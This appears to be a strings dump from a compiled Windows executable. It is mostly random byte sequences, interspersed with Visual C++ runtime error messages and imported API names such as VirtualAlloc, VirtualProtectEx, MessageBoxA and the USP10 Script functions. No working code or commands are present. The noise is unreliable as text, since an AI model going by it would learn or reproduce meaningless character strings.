M$$bUU[o
($$MDMu
mels e s
Me_M$;
MeMUUA
MeoMjj
MessageBoxA
$mFV$GG
Microsoft Visual C++ Runtime Library
MjajUU
mlOatw
MLW4h5
@$$M~M
$	$	MM
$`	+MM1
MM5R$$G
MM$BO$$$
MME$$G
MMe"MM
MM$f$S
MMGNMM
$MMGuu^
mMiYl'
~MM?jj
M^~MjjE
MMjmejMM
?MMj{tj
MMjV4j$$
MMJwjj
MMM3MU
MMM/GGSMrUU
MM;MM]
MM!_MM
MMMqMMM
#MMM(yMM
MMn/$$L
MMO$f$
MM|OGG
MM+PGG
MM?r]T3LM
+MMS1\bS
MM%S$$5
MMu3MM
MMuM$$
MMu;Ru
MM.UU9
!$MMw$$$_N
MMzZMMq
MNaFMuu
!mNU^B
mQQeM9
MS0Mq0
MultiByteToWideChar
MUU%$$
mUU$U$jj
MVMGG	
M$$y_,
"Mzx<r{J
n1hI(rhnaII
n2/>T3
$n4$uD
nAtn@$
   n e
n ,icer
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
@npa@no$
n%SS,P
	NU`x[
n$$$w$
$$$\o$
o2Cqw!
OGG8uu
o$H$UU
_o_J?O
o ort s,S
ot3anv
</<<<O<U<[<
$$~OUU$
oVSopcrTeO
oW4z;:
p1WK!m
P 5]z[w
p_a-MMM_n
$,p$G#
pGVGUU
Pjju#u$$
p$$*KM2
PrepareTape
Program: 
<program name unknown>
P$r@uEJ
$PSSSyMM
"pS-[T:8
pU/olCc
- pure virtual function call
];q`+)
$"q$$$'
q$>!\$
Q~$$$ 
!q8$$#
$$QbMMj	jSSp
Q\f&fY
qgbuuU
qL.T:;
QNCN,s
QQSVW3
QSUVW3
quu7$$
$Q	$U_[Uq7
Q#UX#^
*\R1F4RoG)`
r>%3,"
R3(INwT
!R@4ZSSn
rB$$$c$$
.rdata
RE.`lI
.reloc
RichB5
@Rr=aT
RSS?xU4U
RtlUnwind
rtobci
runtime error 
Runtime Error!
r$Vbo\
R!x\J-
$$*$$S
,sAddz
ScriptApplyDigitSubstitution
ScriptApplyLogicalWidth
ScriptBreak
ScriptCacheGetHeight
ScriptFreeCache
ScriptGetCMap
ScriptGetFontProperties
ScriptGetGlyphABCWidth
ScriptIsComplex
ScriptItemize
ScriptJustify
ScriptLayout
ScriptPlace
ScriptRecordDigitSubstitution
ScriptStringCPtoX
ScriptStringFree
ScriptString_pLogAttr
ScriptStringValidate
ScriptStringXtoCP
ScriptTextOut
ScriptXtoCP
 Seaao u
SEASUX
SetEnvironmentVariableA
SetHandleCount
SFjj<P
$SI9SS
SING error
$$SjxK
SjYTl`
S'$K$$$f
sL!b!:
$$SM1M
}SMMaE
#>sn 0J
SNSS9S
Sn#SUU
srD	ib[
$$\;SS
SS72MMp
SSjm\<
SSLUU$
$SS;PMM
SSrMM#
SSSaI'$$
^SSSSS
SSSUuu	p
SS{tjj
SS}USS
StiCreateInstanceW
STI.dll
SUBhU:ZSS
@S$$UC$$0UU
SunMonTueWedThuFriSat
~S,`V6
|SwSMM5
!sxt'x9
$$SySS
@tAoIVC
t:Azzm
TbGDCN
tbJg\I
t|c8%Z
TerminateProcess
!This program cannot be run in DOS mode.
!tIc|~
,^Tjjj
Tles n
TLOSS error
tm,W?@
!tN^PE
toJF-R!
	T[~Qf2
tSS$&$$"
tte2th
 ttrbtf
t.;t$$t(
tuSSYQ
tu;uH=
Tuuu~u
t/WWUPj
;$$-$$U
"U$$~\
U1uU1F
u$51;E
U6UJUU
u8Uu$$
U9sUj1
$Uag@U@u
$$UcDU
UCjpV\~U
UDGG36
UEUUuup$$
U(fU$$
>:u#FV
u$$$g0
`uGGjP~
UGoUUl7U
UgU$$m
UGXtjG
U$$H5R
U}HU$$r"$$
%uIuUU
Uje)jMM
$)u$jj
ujjEP9
U$-_$j#jX
$UL>d6
U#LUjj3
{u LXE
U$$Mk<M
) UMM4
uMMxjuu
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
>:uNFV
UnhandledExceptionFilter
`uNnMM
UN"USO_S
,uoJS(
=uOuSS
]:uP+R
user32.dll
USP10.dll
u$sU$$
\US|U$$
U$~s$XH
uT4=b`
UtgRrK
U tuu$Ap$
$(]$uu|
$$-uu$
%U_~U$$
UU$#	$
!<UU47	
uu^6MM
UU7PSS
UU{9uu
UUAeD$$
uuauuj
$UU BM
UU"$$c
UU$*,c$
UU,C{3d
UUcLjj
U"~ue1B
UU$E$uu
UUEUU%
UU.!GG
u$/uhi
UUlJ$$
uuMaM$
UUMiMM
U,uMMH
uu$ms$
UUm$SS
*uuMyM
UU^pMMK
U{U$r$
UUrHSSL
uu-?SS
$$u USS
u.utJ(
UUU%$$
uuUgUUP,
u(uujj.
UUUmgZy
UUUpoUU}8
uu^UU1
uu~UU$j
UUU+USS
$/$uu$uuW
uu]uuz
UUu$Vu
UUWuu	
uuxUUN
UU*YSS_
uu\$$zMM
uuzuu_
UwUMFM
*U{x-N
UyU*UM,FM
uZku$$
$$$V]$
$V$$$$
=>v7qD
VC20XC00U
vcI>PoU$
vcV	8c3
V#fS8]x
vI$$lt
VirtualAlloc
VirtualFree
VirtualProtectEx
&VjjwS
=V>_>l>}>X?p?w?
vlY3m=
v$$M\M
@Vn@@C
VqdQ`	e
`vSSym
Vus<X4
W],}-\
$wC(E_
WideCharToMultiByte
$WJsx3
%woHs$$
w\O$$S
WriteFile
>&W!UK
WUU##BH
w$uuUkU
wUuuVBSS&jj
$$wVMM
x5UUBn
XCMM$@$
x?D	ppZL
X"fI;!
$$x#MMM
=xN5fE
x@oAoo
`.xSSU
&Y1\jj
Y"~*'9
yA$$$/
ybHtHM
Yb^[iv
YCw3S]
ydN$$9#]Z
$-yG?(
 ynbOi
ynpu91
(ys96$
.$$YSdMMt
ytJ#0D
$#Y$UU
=Yx4^{
yy3	5I
 $$zdj
zH%UUM"
.zMM]U
$z$$O_
zUUWm$W$
z^UUYc
zUUz$$